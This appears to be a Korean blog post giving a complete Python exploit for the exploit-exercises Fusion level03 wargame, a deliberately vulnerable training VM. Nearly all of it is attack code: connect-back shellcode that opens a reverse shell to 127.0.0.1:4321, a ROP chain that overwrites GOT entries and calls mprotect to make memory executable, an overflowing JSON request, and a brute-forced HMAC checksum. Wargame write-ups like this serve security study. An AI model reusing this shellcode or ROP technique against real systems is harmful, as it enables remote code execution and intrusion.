int $0x80

exploit-exercises fusion level03 본문

워게임/fusion - exploit_exercises

exploit-exercises fusion level03

cd80 cd80 2014.11.01 17:59
from cd80 import *
import hmac
import hashlib
import time
s = makeCon("192.168.81.140", 20003)
token = eval(s.recv(4096))
print token

# LHOST=127.0.0.1 LPORT=4321
shellcode = "\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd" +\
"\x80\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x7f\x00\x00" +\
"\x01\x68\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3" +\
"\x03\x89\xe1\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" +\
"\x69\x6e\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
pack = p
def p(num):
    packed = pack(num)
    ret = ''
    for i in range(0, 4, 2):
        ret += "\\\\u%02x%02x"%(ord(packed[i]), ord(packed[i+1]))
    return ret

####encode shellcode####
shellcode_encoded = ''
for i in range(0, len(shellcode), 4):
    if len(shellcode[i:]) < 4:
        shellcode += "\x00"*(4-len(shellcode[i:]))
    shellcode_encoded += p(up(shellcode[i:i+4]))

####end of encoing####


##### GOT OVERWRITE & make mprotect(gContents, 0x1000, 7) in bss#####
#####
##### socket -> mprotect
##### setsockopt -> &gContents
#####
#####
payload = p(0x8049a4f) # pop ebx; ret
payload += p(0xaaa9b898) # socket@GOT(0x804bd5c) - 0x5d5b04c4
payload += p(0x8049b4f) # pop eax; add esp, 0x5c; ret
payload += p(0xffffab80) # (mprotect - socket)&0xffffffff
payload += p(0x41414141)*(0x5c/4)
payload += p(0x80493fe) # add [ebx + 0x5d5b04c4], eax; ret
payload += p(0x8048e60) # memcpy@PLT
payload += p(0x804a26d) # pppr
payload += p(0x804bd94) # dest : setsockopt@GOT
payload += p(0x804bdf4) # src : unsigned char *gContents
payload += p(4)
##### construct mprotect(gContents, 0x1000, 7) in bss #####                                 # -1 for page id
memcpy_bytes = [0x8048ae4, 0x8049082, 0x804857a, 0x8048179, 0x80485a9, 0x804857a, 0x80481d4, -1, 
                        0x804bdf6, 0x80481d4, 0x804814c, 0x80481d4, 0x80481d4, 0x8048a08, 0x80481d4, 
                        0x80481d4, 0x80481d4]
memcpy_index = [1, 1, 2, 1, 1, 2, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1]
#0x10 ~ 0xf0
page_id = [0x804814c, 0x8048984, 0x80486c4, 0x8048ae4, 0x8048dac, 0x8048b24, 0x8048e8c, 0x80481a0,
               0x8048d37, 0x8048c5c, 0x8048d77, 0x80481bf, 0x8048a04, 0x8048a24, 0x8048d0c]
bss = 0x804be3c
idx = 0
for i in range(0, 15):
    for j in range(0, len(memcpy_index)):
        payload += p(0x8048e60) # memcpy@PLT
        payload += p(0x804a26d) # pppr
        payload += p(bss+idx)
        if memcpy_bytes[j] == -1:
            payload += p(page_id[i])
        else:
            payload += p(memcpy_bytes[j])
        payload += p(memcpy_index[j])
        idx += memcpy_index[j]
setsockopt_bytes = [0x8048984, 0x804bdad, 0x804857a]
setsockopt_index = [1,1,2]
for i in range(0, len(setsockopt_index)):
    payload += p(0x8048e60)
    payload += p(0x804a26d)
    payload += p(bss+idx)
    payload += p(setsockopt_bytes[i])
    payload += p(setsockopt_index[i])
    idx += setsockopt_index[i]
    
payload += p(0x8049207) # pop ebp; ret
payload += p(bss-4)
payload += p(0x8049431) # leaveret

##### END OF GOT OVERWRITE #####

request = token
request += '\n'
request += '{'
request += '"serverip": "127.0.0.1", '
request += '"title": "'+"a"*(127)+"\\\\u6161"+"A"*31+payload+'", '
request += '"contents": "'+shellcode_encoded
request += '"}//'
nowhash = 0
i=0
start = time.time()
while i <= 0xffffffff:
    nowhash = hmac.new(token, request+p(i), hashlib.sha1).digest()
    if ord(nowhash[0]) == 0 and ord(nowhash[1]) == 0:
        print "checksum done in %d seconds. salt : %d"%(time.time()-start, i)
        break
    if not i % 10000:
        print "Trying...%d [ %d seconds elapsed ]"%(i, time.time()-start)
    i += 1

s.send(request+p(i))
s.close()

'워게임 > fusion - exploit_exercises' 카테고리의 다른 글

exploit-exercises fusion level04  (1) 2014.11.03
exploit-exercises fusion level03  (0) 2014.11.01
exploit-exercises fusion level02  (0) 2013.09.29
exploit-exercises fusion level01  (0) 2013.09.29
exploit-exercises fusion level00  (0) 2013.09.28
0 Comments
댓글쓰기 폼